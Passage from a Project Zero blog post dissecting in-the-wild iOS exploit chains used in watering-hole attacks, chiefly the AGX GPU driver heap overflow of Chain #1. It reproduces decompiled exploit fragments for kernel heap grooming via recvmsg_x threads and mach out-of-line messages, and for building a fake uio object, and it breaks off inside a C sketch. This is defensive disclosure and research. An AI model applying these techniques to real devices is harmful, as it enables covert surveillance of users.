Project Zero

News and updates from the Project Zero team at Google

A very deep dive into iOS Exploit chains found in the wild

30 August, 2019 - 02:06
Posted by Ian Beer, Project Zero

Project Zero’s mission is to make 0-day hard. We often work with other companies to find and report security vulnerabilities, with the ultimate goal of advocating for structural security improvements in popular systems to help protect people everywhere.  

Earlier this year Google's Threat Analysis Group (TAG) discovered a small collection of hacked websites. The hacked sites were being used in indiscriminate watering hole attacks against their visitors, using iPhone 0-day.  

There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant. We estimate that these sites receive thousands of visitors per week.  

TAG was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12. This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years.

I’ll investigate what I assess to be the root causes of the vulnerabilities and discuss some insights we can gain into Apple's software development lifecycle. The root causes I highlight here are not novel and are often overlooked: we'll see cases of code which seems to have never worked, code that likely skipped QA or likely had little testing or review before being shipped to users.

Working with TAG, we discovered exploits for a total of fourteen vulnerabilities across the five exploit chains: seven for the iPhone’s web browser, five for the kernel and two separate sandbox escapes. Initial analysis indicated that at least one of the privilege escalation chains was still 0-day and unpatched at the time of discovery (CVE-2019-7287 & CVE-2019-7286). We reported these issues to Apple with a 7-day deadline on 1 Feb 2019, which resulted in the out-of-band release of iOS 12.1.4 on 7 Feb 2019. We also shared the complete details with Apple, which were disclosed publicly on 7 Feb 2019.

Now, after several months of careful analysis of almost every byte of every one of the exploit chains, I’m ready to share these insights into the real-world workings of a campaign exploiting iPhones en masse.

This post will include:
  • detailed write-ups of all five privilege escalation exploit chains;
  • a teardown of the implant used, including a demo of the implant running on my own devices, talking to a reverse-engineered command and control server and demonstrating the capabilities of the implant to steal private data like iMessages, photos and GPS location in real-time, and
  • analysis by fellow team member Samuel Groß on the browser exploits used as initial entry points.

Let’s also keep in mind that this was a failure case for the attacker: for this one campaign that we’ve seen, there are almost certainly others that are yet to be seen.

Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group. All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly, treating their mobile devices both as integral to their modern lives and as devices which, when compromised, can upload their every action into a database to potentially be used against them.

I hope to guide the general discussion around exploitation away from a focus on the million dollar dissident and towards discussion of the marginal cost for monitoring the n+1'th potential future dissident. I shan't get into a discussion of whether these exploits cost $1 million, $2 million, or $20 million. I will instead suggest that all of those price tags seem low for the capability to target and monitor the private activities of entire populations in real time.

I recommend that these posts are read in the following order:
  1. iOS Exploit Chain #1
  2. iOS Exploit Chain #2
  3. iOS Exploit Chain #3
  4. iOS Exploit Chain #4
  5. iOS Exploit Chain #5
  6. JSC Exploits
  7. Implant Teardown

Category: Hacking & Security

In-the-wild iOS Exploit Chain 1

30 August, 2019 - 02:05
Posted by Ian Beer, Project Zero


This exploit provides evidence that these exploit chains were likely written contemporaneously with their supported iOS versions; that is, the exploit techniques which were used suggest that this exploit was written around the time of iOS 10. This suggests that this group had a capability against a fully patched iPhone for at least two years.  
This is one of the three chains (of five chains total) which exploit only one kernel vulnerability that was directly reachable from the Safari sandbox.

In-the-wild iOS Exploit Chain 1 - AGXAllocationList2::initWithSharedResourceList heap overflow

We'll look first at the earliest chain we found. This targets iOS 10.0.1-10.1.1 and has probably been active since September 2016.

targets: 5s through 7, 10.0.1 through 10.1.1

supported version matrix:
  • iPhone6,1 (5s, N51AP)
  • iPhone6,2 (5s, N53AP)
  • iPhone7,1 (6 plus, N56AP)
  • iPhone7,2 (6, N61AP)
  • iPhone8,1 (6s, N71AP)
  • iPhone8,2 (6s plus, N66AP)
  • iPhone8,4 (SE, N69AP)
  • iPhone9,1 (7, D10AP)
  • iPhone9,2 (7 plus, D11AP)
  • iPhone9,3 (7, D101AP)
  • iPhone9,4 (7 plus, D111AP)

version support is slightly different between platforms:

iPhone 6,*;7,*;8,*:
  • 14A403 (10.0.1 - 13 Sep 2016) this is the first public version of iOS 10
  • 14A456 (10.0.2 - 23 Sep 2016)
  • 14B72 (10.1 - 24 Oct 2016)
  • 14B100 (10.1.1 - 31 Oct 2016)
  • 14B150 (10.1.1 - 9 Nov 2016)

iPhone 9,*:
  • 14A403 (10.0.1 - 13 Sep 2016)
  • 14A456 (10.0.2 - 23 Sep 2016)
  • 14A551 (10.0.3 - 17 Oct 2016) NOTE: this version was iPhone 7 only ("cellular connectivity problem")
  • 14B72c (10.1 - 24 Oct 2016)
  • 14B100 (10.1.1 - 31 Oct 2016)
  • 14B150 (10.1.1 - 9 Nov 2016)

First unsupported version: 10.2 - 12 December 2016

The first kernel vulnerability

The first kernel vulnerability is a heap overflow in the function AGXAllocationList2::initWithSharedResourceList, part of the com.Apple.AGX kext, a driver for the embedded GPU in the iPhone. The vulnerability is reachable from the WebContent sandbox; there is no separate sandbox escape vulnerability.

AGXAllocationList2::initWithSharedResourceList is a C++ virtual member method which takes two arguments, a pointer to an IOAccelShared2 object and a pointer to an IOAccelSegmentResourceListHeader object. That resource list header pointer points to memory which is shared with userspace and the contents are fully attacker-controlled. The bug lies in the code which parses that resource list structure, which is laid out as follows.

There's an 0x18 byte header structure, the last dword of which is a count of the number of following sub-descriptor structures. Each of those sub-descriptor structures is 0x40 bytes, with the last two bytes being a uint16_t count of sub-entries contained in the sub-descriptor.

The sub-descriptor contains two arrays, one of dword resource-id values, and one of two-byte flags. They are meant to be seen as pairs, with the first flag matching up with the first resource id.

The driver reads the n_entries value from shared memory and multiplies it by 6 to determine what it believes should be the maximum total number of sub-resources across all the sub-descriptors:

n_entries = *(_DWORD *)(shmem_ptr + 0x14);
n_max_subdescriptors = 6 * n_entries;

This value is then multiplied by 8, as for each subresource_id they'll store a pointer:

resources_buf = IOMalloc(8 * n_max_subdescriptors);
The code then continues on to parse the sub-descriptors:

n_entries = *(_DWORD *)(shmem_ptr + 0x14);
...
void* resource = NULL;
size_t total_resources = 0;
input = (struct input*)shmem_ptr;
struct sub_desc* desc = &input->descs[0];
for (i = 0; i < n_entries; i++) {
  for (int j = 0; j < desc->n_sub_entries; j++) {
    int err = IOAccelShared2::lookupResource(ioaccel_shared,
                                             desc->resource_ids[j],
                                             &resource);
    if (err) {
      goto fail;
    }

    unsigned short flags = desc->flags[j];

    if (flags_invalid(flags)) {
      goto fail;
    }
    resources_buf[total_resources++] = resource;
  }
  ...
}

The issue is that the code never validates the assumption that each sub-descriptor has at most 6 sub-entries; there's actually space in the structure for 7 completely controlled resource_id and flag pairs. The code assumes that resources_buf was allocated for the worst case of 6 entries per sub-descriptor, so there are no bounds checks when the loop writes to resources_buf.

Since n_entries is completely controlled, the attacker can control the size passed to IOMalloc. They can also control the number of sub-descriptors which contain 7 rather than 6 entries, allowing them to write a controlled number of pointers off the end of the target IOMalloc allocation. Those will be pointers to IOAccelResource2 objects.
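
The arithmetic behind the overflow can be sketched in a few lines of C. This is only a model of the sizes described above, not driver code: the function names alloc_size and overflow_bytes and the three constants are made up for illustration, and it ignores any integer-width effects in the real multiplication.

```c
#include <assert.h>
#include <stdint.h>

/* Constants taken from the description above (names are hypothetical). */
#define ASSUMED_MAX_PER_DESC 6u /* entries the driver budgets for per sub-descriptor */
#define ACTUAL_MAX_PER_DESC  7u /* entries the structure actually has room for */
#define POINTER_SIZE         8u /* one pointer is stored per sub-entry */

/* Bytes requested from IOMalloc for n_entries sub-descriptors. */
static uint64_t alloc_size(uint32_t n_entries) {
    return (uint64_t)POINTER_SIZE * ASSUMED_MAX_PER_DESC * n_entries;
}

/* Bytes written past the end of the buffer when n_full of the
 * sub-descriptors carry 7 entries and the remaining ones carry 6. */
static uint64_t overflow_bytes(uint32_t n_entries, uint32_t n_full) {
    assert(n_full <= n_entries);
    uint64_t entries_written =
        (uint64_t)ACTUAL_MAX_PER_DESC * n_full +
        (uint64_t)ASSUMED_MAX_PER_DESC * (n_entries - n_full);
    return entries_written * POINTER_SIZE - alloc_size(n_entries);
}
```

For example, with 10 sub-descriptors the buffer is 480 bytes; if 3 of them carry 7 entries, 3 extra pointers (24 bytes) land beyond the allocation. Each over-full sub-descriptor contributes exactly one out-of-bounds pointer, which is what gives the attacker a controlled overflow length.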
Note that the second fetch of n_entries from shared memory isn't a decompiler error; it's really there in the binary:

fetch LDR  W8, [X19,#0x14]
...
fetch LDR  W8, [X19,#0x14]

This is not the bug which was exploited; in fact this variant wasn't fixed until iOS 12. See the code in Appendix A for the trigger for this variant. Note that this would have meant that with only minor changes the exploit would have continued to work for years after the initial patch. The variant overflows the same buffer with the same values.

start

All the exploits start by calling task_threads() then thread_terminate() in a loop to stop all other running threads in the WebContent task where the attackers get initial remote code execution.

This first chain uses the system loader to resolve symbols but they chose to not link against the IOSurface framework which they use, so they call dlopen() to get a handle to the IOSurface.dylib userspace library and resolve two function pointers (IOSurfaceCreate and IOSurfaceGetID) via dlsym(). These will be used later.

System Identification

They read the hw.machine sysctl variable to get the device model name (which is a string like "iPhone6,1") and read the ProductBuildVersion value from the CFDictionary returned by CFCopySystemVersionDictionary() to get the OS build ID. From this combination they can determine exactly which kernel image is running on the device.

They format this information into a string like "iPhone6,1(14A403)" (which would be for iOS 10.0.1 running on iPhone 5S.) From the __DATA segment of the exploit binary they read a serialized NSDictionary (via [NSKeyedUnarchiver unarchiveObjectWithData:].) The dictionary maps the supported hardware and kernel image pairs to structures containing pointers and offsets used later in the exploit.

{
    "iPhone6,1(14A403)" = <a8a20700 00000000 40f60700 00000000 50885000 00000000 80a05a00 00000000 0c3c0900 00000000 c41f0800 00000000 28415a00 00000000 98085300 00000000 60f56000 00000000 005a4600 00000000 50554400 00000000 a4b73a00 00000000 00001000 00000000 50a05a00 00000000 b8a05a00 00000000 68e4fdff ffffffff>;
    "iPhone6,1(14A456)" = <a8a20700 00000000 40f60700 00000000 50885000 00000000 80a05a00 00000000 0c3c0900 00000000 c41f0800 00000000 28415a00 00000000 98085300 00000000 60f56000 00000000 005a4600 00000000 50554400 00000000 a4b73a00 00000000 00001000 00000000 50a05a00 00000000 b8a05a00 00000000 68e4fdff ffffffff>;
    ....
}

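
To make the dump above easier to read, here is a minimal sketch of decoding it. It assumes each pair of 4-byte groups is one little-endian 64-bit value, which the byte pattern suggests but the text does not state; read_le64 and the two sample arrays are names introduced here purely for illustration.

```c
#include <stdint.h>

/* First and last 8 bytes of the "iPhone6,1(14A403)" entry, copied from the dump. */
static const uint8_t sample_first_field[8] =
    {0xa8, 0xa2, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00};
static const uint8_t sample_last_field[8] =
    {0x68, 0xe4, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xff};

/* Assemble a 64-bit value from 8 bytes stored least-significant byte first. */
static uint64_t read_le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) {
        v = (v << 8) | p[i];
    }
    return v;
}
```

Under that assumption the first field decodes to 0x7a2a8, and the last one to 0xfffffffffffde468, which read as a signed value is the small negative number -0x21b98. That fits the description of the structures holding a mix of offsets and pointers.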
They read the hw.memsize sysctl to determine whether the device has more than 1GB of RAM. Devices with 1GB of RAM (5s, 6, 6 plus) use a 4kB physical page size, whereas those with more than 1GB of RAM use 16kB physical pages. This difference is important because the kernel zone allocator has slightly different behaviour when physical page sizes are different. We'll look more closely at these differences when they become relevant.

Exploitation

They open an IOSurfaceRootUserClient:

matching_dict = IOServiceMatching("IOSurfaceRoot");
ioservice = IOServiceGetMatchingService(kIOMasterPortDefault, matching_dict);
IOServiceOpen(ioservice,
              mach_task_self(),
              0, // the userclient type
              &userclient);

IOSurfaces are intended to be used as buffers for graphics operations, but none of the exploits use this intended functionality. Instead they use one other very convenient feature: the ability to associate arbitrary kernel OSObjects with an IOSurface for heap grooming.

The documentation for IOSurfaceSetValue nicely explains its functionality:

This call lets you attach CF property list types to an IOSurface buffer. This call is expensive (it must essentially serialize the data into the kernel) and thus should be avoided whenever possible.

Those Core Foundation property list objects will be serialized in userspace then the kernel will deserialize them into their corresponding OSObject types and attach them to the IOSurface:

CFDictionary -> OSDictionary
CFSet        -> OSSet
CFNumber     -> OSNumber
CFBoolean    -> OSBoolean
CFString     -> OSString
CFData       -> OSData

The last two types are of particular interest as they're variable-sized. By serializing different length CFString and CFData objects as IOSurface properties you can exercise quite a lot of control over the kernel heap. Even more importantly, these properties can be read back in a non-destructive way via IOSurfaceCopyValue, making them an excellent target for building memory disclosure primitives from memory corruption vulnerabilities. We'll see both these techniques used multiple times across the exploit chains.

What is IOKit?

IOKit is the framework used in iOS for building device drivers. It's written in C++ and drivers can make use of object-oriented features, such as inheritance, to aid the rapid development of new code.

An IOKit driver which wishes to communicate with userspace in some way consists of two major parts: an IOService and an IOUserClient (often just called a user client.)

IOServices can be thought of as providing the functionality of the driver.

The IOUserClient is the interface between the IOService and userspace clients of the driver. There can be a large number of IOUserClients per IOService, but typically there's only one (or a small number) of IOServices per hardware device.

The reality is of course more complex, but this simplified view suffices to understand the relevance of the attack surfaces.

Talking to IOKit

Userspace communicates with IOUserClient objects via external methods. These can be thought of as syscalls exposed by the IOUserClient objects to userspace, callable by any process which has a send right to the mach port representing the IOUserClient object. External methods are numbered and can take variable sized input arguments. We'll look in great detail at exactly how this works when it becomes necessary for future exploits in the series.

Let's get back to the first exploit chain and see how they get started.

Setting up the trigger

They open an AGXSharedUserClient:

matching_dict = IOServiceMatching("IOGraphicsAccelerator2");
agx_service = IOServiceGetMatchingService(kIOMasterPortDefault, matching_dict);
AGXSharedUserClient = 0;
IOServiceOpen(agx_service,
              mach_task_self(),
              2, // type -> AGXSharedUserClient
              &AGXSharedUserClient);

In IOKit parlance matching is the process of finding the correct device driver for a purpose; in this case they're using the matching system to open a user client connection to a particular driver.

The call to IOServiceOpen will invoke a sandbox policy check. Here's the relevant section from the sandbox profile on iOS which allows access to this IOKit device driver from inside the MobileSafari renderer process:

(allow iokit-open
       (iokit-user-client-class "IOSurfaceRootUserClient")
       (iokit-user-client-class "IOSurfaceSendRight")
       (iokit-user-client-class "IOHIDEventServiceFastPathUserClient")
       (iokit-user-client-class "AppleKeyStoreUserClient")
       (require-any (iokit-user-client-class "IOAccelDevice")
                    (iokit-user-client-class "IOAccelDevice2")
                    (iokit-user-client-class "IOAccelSharedUserClient")
                    (iokit-user-client-class "IOAccelSharedUserClient2")
                    (iokit-user-client-class "IOAccelSubmitter2")
                    (iokit-user-client-class "IOAccelContext")
                    (iokit-user-client-class "IOAccelContext2"))
       (iokit-user-client-class "IOSurfaceAcceleratorClient")
       (extension "")
       (iokit-user-client-class "AppleJPEGDriverUserClient")
       (iokit-user-client-class "IOHIDLibUserClient")
       (iokit-user-client-class "IOMobileFramebufferUserClient"))

AGXSharedUserClient, though not explicitly mentioned in the profile, is allowed because it inherits from IOAccelSharedUserClient2. This human-readable version of the sandbox profile was generated by the sandblaster tool from an iOS 11 kernelcache.

I mentioned earlier that the bug is triggered by the kernel reading a structure from shared memory; the next step in the exploit is to use the AGX driver's external method interface to allocate two shared memory regions, using external method 6 (create_shmem) of the AGXSharedUserClient:

create_shmem_result_size = 0x10LL;
u64 scalar_in = 4096LL; // scalar in = size
v42 = IOConnectCallMethod(
        AGXSharedUserClient,
        6,          // selector number for create_shmem external method
        &scalar_in, // scalar input, value is shm size
        1,          // number of scalar inputs
        0,
        0,
        0,
        0,
        &create_shmem_result,       // structure output pointer
        &create_shmem_result_size); // structure output size pointer

IOConnectCallMethod is the main (though not the sole) way to call external methods on userclients. The first argument is the mach port name which represents this userclient connection. The second is the external method number (called the selector.) The remaining arguments are the inputs and outputs.

This method returns a 16-byte structure output which looks like this:

struct create_shmem_out {
  void* base;
  u32 size;
  u32 id;
};

base is the address in the task where the driver mapped the shared memory, size is the size and id a value used to refer to this resource later.

They allocate two of these shared memory regions; the first is left empty and the second will contain the trigger allocation list structure.

They also create a new IOAccelResource with ID 3 via the AGXSharedUserClient external method 3 (IOAccelSharedUserClient::new_resource.)

Heap groom

The loop containing the trigger function is very curious; right before triggering the bug they create around 100 threads. When I was first trying to determine the root cause of the bug they were exploiting, this pointed towards one of two things:

  1. They were exploiting a race condition bug.
  2. They were trying to remove noise from the heap, by busy looping many threads and preventing other processes from using the kernel heap.

Here's the outer loop which is creating the threads:

for (int i = 0; i < constant_0x10_or_0x13 + 1; i++) {
  for ( j = 0; j < v6 - 1; ++j ){
    pthread_create(&pthread_t_array[iter_cnt],
                   NULL,
                   thread_func,
                   &domain_socket_fds[2 * iter_cnt]);
    while (!domain_socket_fds[2 * iter_cnt] ) {;};
    n_running_threads = ++iter_cnt;
    usleep(10);
  }
  send_kalloc_reserver_message(global_mach_port[i + 50],
                               target_heap_object_size,
                               1);
}

Here's the function passed to pthread_create; it's pretty clear that neither of those hypotheses was even close to accurate:

void* thread_func(void* arg) {
  int sockets[2] = {0};

  global_running_threads++;
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
    return NULL;
  }

  char buf[256];
  struct msghdr_x hdrs[1024] = {0};
  struct iovec iov;
  iov.iov_base = buf;
  iov.iov_len = 256;

  for (int i = 0; i < constant_value_from_offsets/0x20; i++) {
    hdrs[i].msg_iov = &iov;
    hdrs[i].msg_iovlen = 1;
  }

  *(int*)arg = sockets[0];
  *((int*)arg + 1) = sockets[1];

  recvmsg_x(sockets[0], hdrs, constant_value_from_offsets/0x20, 0);

  return NULL;
}

This is pretty clearly not a trigger for a shared-memory bug. They're also very unlikely to be using this to busy-loop a CPU core: the recvmsg_x syscall will block until there's data to be read and yield the CPU back to the scheduler.

The only hint to what's going on is that the number of loop iterations is set by a value read from the offsets data structure they parsed from the NSArchiver. This indicates that perhaps this is something like a novel heap-grooming technique. Let's look at the code for recvmsg_x and try to work out what's going on.

recvmsg_x heap groom

The prototype for the recvmsg_x syscall is:

user_ssize_t recvmsg_x(int s, struct msghdr_x *msgp, u_int cnt, int flags);
The msgp argument is a pointer to an array of msghdr_x structures:

struct msghdr_x {
  user_addr_t msg_name;       /* optional address */
  socklen_t   msg_namelen;    /* size of address */
  user_addr_t msg_iov;        /* scatter/gather array */
  int         msg_iovlen;     /* # elements in msg_iov */
  user_addr_t msg_control;    /* ancillary data, see below */
  socklen_t   msg_controllen; /* ancillary data buffer len */
  int         msg_flags;      /* flags on received message */
  size_t      msg_datalen;    /* byte length of buffer in msg_iov */
};

The cnt argument is the number of these structures contained in the array. In the exploit the msg_iov is set to always point to the same single-entry iovec which points to a 256-byte stack buffer, and msg_iovlen is set to 1 (the number of iovec entries.)

The recvmsg_x syscall is implemented in bsd/kern/uipc_syscalls.c. It will initially make three variable-sized kernel heap allocations:

user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),
                     M_TEMP, M_WAITOK | M_ZERO);
...
recv_msg_array = alloc_recv_msg_array(uap->cnt);
...
umsgp = _MALLOC(uap->cnt * size_of_msghdr,
                M_TEMP, M_WAITOK | M_ZERO);

The msgp userspace buffer is then copied in to the umsgp buffer:

error = copyin(uap->msgp, umsgp, uap->cnt * size_of_msghdr);
sizeof(struct user_msghdr_x) is 0x38, and size_of_msghdr is also 0x38. alloc_recv_msg_array is just a simple wrapper around _MALLOC which multiplies count by sizeof(struct recv_msg_elem):

struct recv_msg_elem *alloc_recv_msg_array(u_int count)
{
  struct recv_msg_elem *recv_msg_array;

  recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem),
                           M_TEMP, M_WAITOK | M_ZERO);

  return (recv_msg_array);
}

sizeof(struct recv_msg_elem) is 0x20. Recall that the grooming thread function passed a constant divided by 0x20 as the cnt argument to the recvmsg_x syscall; it's quite likely therefore that this is the allocation which is being targeted. So what's in here?

It's allocating an array of struct recv_msg_elems:

struct recv_msg_elem {
  struct uio *uio;
  struct sockaddr *psa;
  struct mbuf *controlp;
  int which;
  int flags;
};

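
As a sanity check of the sizes quoted so far, the following sketch models the three allocations recvmsg_x makes for a given target size. It is not kernel code: recv_msg_elem_model stands in for the real structure with 64-bit pointers written as uint64_t, and allocs_for_target and the recvmsg_x_allocs struct are hypothetical helpers. The 0x38 sizes are the ones stated above.

```c
#include <assert.h>
#include <stdint.h>

/* Stand-in for struct recv_msg_elem on a 64-bit kernel (pointers as uint64_t). */
struct recv_msg_elem_model {
    uint64_t uio;      /* struct uio *      */
    uint64_t psa;      /* struct sockaddr * */
    uint64_t controlp; /* struct mbuf *     */
    int32_t  which;
    int32_t  flags;
};

#define USER_MSGHDR_X_SIZE 0x38u /* sizeof(struct user_msghdr_x), as stated above */
#define MSGHDR_SIZE        0x38u /* size_of_msghdr, as stated above */

/* Sizes of the three heap allocations made for one recvmsg_x call. */
struct recvmsg_x_allocs {
    uint64_t user_msg_x;
    uint64_t recv_msg_array;
    uint64_t umsgp;
};

/* Pick cnt the way the grooming thread does (target size / 0x20) and
 * report how large each of the three allocations would be. */
static struct recvmsg_x_allocs allocs_for_target(uint32_t target_size) {
    uint32_t elem = (uint32_t)sizeof(struct recv_msg_elem_model);
    assert(target_size % elem == 0);
    uint32_t cnt = target_size / elem;
    struct recvmsg_x_allocs a = {
        .user_msg_x     = (uint64_t)cnt * USER_MSGHDR_X_SIZE,
        .recv_msg_array = (uint64_t)cnt * elem,
        .umsgp          = (uint64_t)cnt * MSGHDR_SIZE,
    };
    return a;
}
```

For an illustrative target of 4096 bytes, cnt is 128: the recv_msg_elem array is exactly 4096 bytes while the two header buffers are 7168 bytes each, so only the array lands in the targeted allocation size.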
This array is going to be filled in by internalize_recv_msghdr_array:

error = internalize_recv_msghdr_array(umsgp,  IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32,  UIO_READ, uap->cnt, user_msg_x, recv_msg_array);
This function allocates and initializes a kernel uio structure for each of the iovec arrays contained in the input array of msghdr_x's:

recv_msg_elem->uio = uio_create(user_msg->msg_iovlen, 0,     spacetype, direction);
error = copyin_user_iovec_array(user_msg->msg_iov, spacetype, user_msg->msg_iovlen, iovp);
uio_create allocates space for the uio structure and the iovector base and length pointers inline:

uio_t uio_create(int a_iovcount,     /* number of iovecs */
                 off_t a_offset,     /* current offset */
                 int a_spacetype,    /* type of address space */
                 int a_iodirection ) /* read or write flag */
{
  void*  my_buf_p;
  size_t my_size;
  uio_t  my_uio;

  my_size = UIO_SIZEOF(a_iovcount);
  my_buf_p = kalloc(my_size);
  my_uio = uio_createwithbuffer(a_iovcount,
                                a_offset,
                                a_spacetype,
                                a_iodirection,
                                my_buf_p,
                                my_size );

  if (my_uio != 0) {
    /* leave a note that we allocated this uio_t */
    my_uio->uio_flags |= UIO_FLAGS_WE_ALLOCED;
  }

  return( my_uio );
}

Here's UIO_SIZEOF:

#define UIO_SIZEOF( a_iovcount ) \
  ( sizeof(struct uio) + (MAX(sizeof(struct user_iovec), sizeof(struct kern_iovec)) * (a_iovcount)) )

struct uio looks like this:

struct uio {
  union iovecs uio_iovs;    /* current iovec */
  int uio_iovcnt;           /* active iovecs */
  off_t uio_offset;
  enum uio_seg uio_segflg;
  enum uio_rw uio_rw;
  user_size_t uio_resid_64;
  int uio_size;             /* size for use with kfree */
  int uio_max_iovs;         /* max number of iovecs this uio_t can hold */
  u_int32_t uio_flags;
};

There's a lot going on here; let's look at this diagrammatically:

On 4k devices they spin up 7 threads, which will make 7 of the recv_msg_elem array allocations, then they send a kalloc_reserver message which will make one more target kalloc allocation which can be free'd independently.

Heap grooming technique 2: out-of-line memory in mach messages

As you can see from the diagram above, the recv_msg_elem allocations are interspersed with 4kb kalloc allocations. They make these allocations via crafted mach messages. Here's the function which builds and sends these messages:

struct kalloc_reserver_message {
  mach_msg_header_t header; /* header + body: same layout as mach_msg_base_t */
  mach_msg_body_t body;
  mach_msg_ool_descriptor_t descs[62];
};

int
send_kalloc_reserver_message(mach_port_t dst_port,
                             int kalloc_size,
                             int n_kallocs)
{
  struct kalloc_reserver_message msg = {0};
  char buf[0x800] = {0};

  msg.header.msgh_bits =
    MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND,
                       0,
                       0,
                       MACH_MSGH_BITS_COMPLEX);

  msg.header.msgh_remote_port = dst_port;
  msg.header.msgh_size = sizeof(mach_msg_base_t) +
                         (n_kallocs * sizeof(mach_msg_ool_descriptor_t));
  msg.body.msgh_descriptor_count = n_kallocs;

  for (int i = 0; i < n_kallocs; i++) {
    msg.descs[i].address = buf;
    msg.descs[i].size    = kalloc_size - 24;
    msg.descs[i].type    = MACH_MSG_OOL_DESCRIPTOR;
  }

  kern_return_t err = mach_msg(&msg.header,
                               MACH_SEND_MSG,
                               msg.header.msgh_size,
                               0,
                               0,
                               0,
                               0);

  return (err == KERN_SUCCESS);
}

A mach message may contain "out-of-line data". This is intended to be used to send larger data buffers in a mach message while allowing the kernel to potentially use virtual memory optimisations to avoid copying the contents of the memory. (See my recent P0 blog post on finding and exploiting vulnerabilities in those tricks for more details.)

Out-of-line memory regions are specified in a mach message using the following descriptor structure in the kernel-processed region of the message:

typedef struct {
  void*                      address;
  boolean_t                  deallocate: 8;
  mach_msg_copy_options_t    copy: 8;
  unsigned int               pad1: 8;
  mach_msg_descriptor_type_t type: 8;
  mach_msg_size_t            size;
} mach_msg_ool_descriptor_t;

address points to the base of the buffer to be sent in the message and size is the length of the buffer in bytes. If the size value is small (less than two physical pages) then the kernel will not attempt to perform any virtual memory trickery but instead simply allocate an equally sized kernel buffer via kalloc and copy the contents of the region to be sent into there.

The kernel buffer for the copy has the following 24-byte header at the start:

struct vm_map_copy {
  int type;
  vm_object_offset_t offset;
  vm_map_size_t size;
  union {
    struct vm_map_header hdr;      /* ENTRY_LIST */
    vm_object_t          object;   /* OBJECT */
    uint8_t              kdata[0]; /* KERNEL_BUFFER */
  } c_u;
};

That's the reason the size field in the descriptor has 24 subtracted from it. This technique is used frequently throughout the exploit chains to make controlled-size kalloc allocations (with almost completely controlled data.) By destroying the port to which the reserver message was sent without receiving the message they can cause the kalloc allocations to be free'd.
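
The 24-byte figure can be checked with a small model of the header fields that precede the inline data. This is a sketch under the assumption of a 64-bit ABI where 64-bit integers are 8-byte aligned; vm_map_copy_header_model and ool_size_for_kalloc are names invented here, and the real kernel types are replaced with fixed-width integers.

```c
#include <assert.h>
#include <stdint.h>

/* The fields of struct vm_map_copy that sit in front of kdata[],
 * with the kernel typedefs replaced by fixed-width integers. */
struct vm_map_copy_header_model {
    int32_t  type;   /* followed by 4 bytes of padding */
    uint64_t offset; /* vm_object_offset_t */
    uint64_t size;   /* vm_map_size_t */
};

/* Descriptor size to request so that header + data add up to kalloc_size. */
static uint32_t ool_size_for_kalloc(uint32_t kalloc_size) {
    uint32_t header = (uint32_t)sizeof(struct vm_map_copy_header_model);
    assert(kalloc_size > header);
    return kalloc_size - header;
}
```

So to make the kernel perform a 4096-byte kalloc, the sender describes a 4072-byte out-of-line region; the kernel prepends the header and the total lands exactly on the desired size.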

They repeat the recv_msg_elem/kalloc_reserver layout a few times, trying to improve the odds that one of the kalloc_reservers lies just before a recv_msg_elem array allocation. On 16k devices they start 15 threads at a time, then send one kalloc_reserver message. This makes sense as 16 target allocation sized objects would fit within one target-size'd kalloc chunk on 16k devices.

They then free all the kalloc_reservers (by destroying the ports to which the messages were sent) in the opposite order that they were allocated, and then reallocate half of them. The idea here is to try to ensure that the next kalloc allocation to be allocated from the target kalloc.4096 zone will fall in one of the gaps in-between the recv_msg_arrays.

Once the groom is set up and the holes in the heap are likely in the right place they trigger the bug.

The trigger shared resource list is set up such that it will make a 4kb kalloc allocation (hopefully landing in one of the gaps) then the bug will cause an IOAccelResource pointer to be written one element off the end of that buffer, corrupting the first qword value of the following recv_msg_elem array:

If the heap groom worked this will have corrupted one of the uio pointers, overwriting it with a pointer to an IOAccelResource.

They then call external method 1 on the AGXSharedUserClient (delete_resource) which will free the IOAccelResource. This means that one of those uio pointers now points to a free'd IOAccelResource.

Then they use the IOSurface properties technique to allocate many 0x190 byte OSData objects in the kernel with the following layout:

u32 +0x28 = 0x190;
u32 +0x30 = 2;

Here's the code where they build that:

  char buf[0x190];
  char key[100];

  memset(buf, 0, 0x190uLL);
  *(uint32_t*)&buf[0x28] = 0x190;
  *(uint32_t*)&buf[0x30] = 2;
  id arr = [[NSMutableArray alloc] initWithCapacity: 100];
  id data = [NSData dataWithBytes:buf length:100];
  int cnt = 2 * (system_page_size / 0x200);
  for (int i = 0; i < cnt; i++) {
    [arr addObject: data];
  }

  memset(key, 0, 100);
  snprintf(key, sizeof(key), "large_%d", replacement_attempt_cnt);

  return wrap_iosurfaceroot_set_value(key, val);

They are trying to reallocate the free'd memory with an OSData object. Overlaying those offsets against a struct uio you see that +0x28 is the uio_size field, and +0x30 the flags field. 2 is the following UIO flag value:

#define UIO_FLAGS_WE_ALLOCED 0x00000002
So they've replaced the dangling UIO with... a completely valid, if empty, UIO?
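
The overlay of those two offsets onto struct uio can be verified with a stand-in structure. This is a sketch, not the kernel definition: uio_model replaces the kernel types with fixed-width integers of the sizes they would have on a 64-bit kernel, and fake_uio_field is a hypothetical helper that rebuilds the 0x190-byte buffer and reads a field back out of it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for struct uio with fixed-width types (64-bit kernel assumed). */
struct uio_model {
    uint64_t uio_iovs;     /* union iovecs: a single pointer */
    int32_t  uio_iovcnt;
    int64_t  uio_offset;   /* off_t */
    int32_t  uio_segflg;   /* enum uio_seg */
    int32_t  uio_rw;       /* enum uio_rw */
    uint64_t uio_resid_64; /* user_size_t */
    int32_t  uio_size;
    int32_t  uio_max_iovs;
    uint32_t uio_flags;
};

#define UIO_FLAGS_WE_ALLOCED 0x00000002u
#define FAKE_UIO_SIZE        0x190u

/* Build the fake uio the way the exploit's buffer does, then return the
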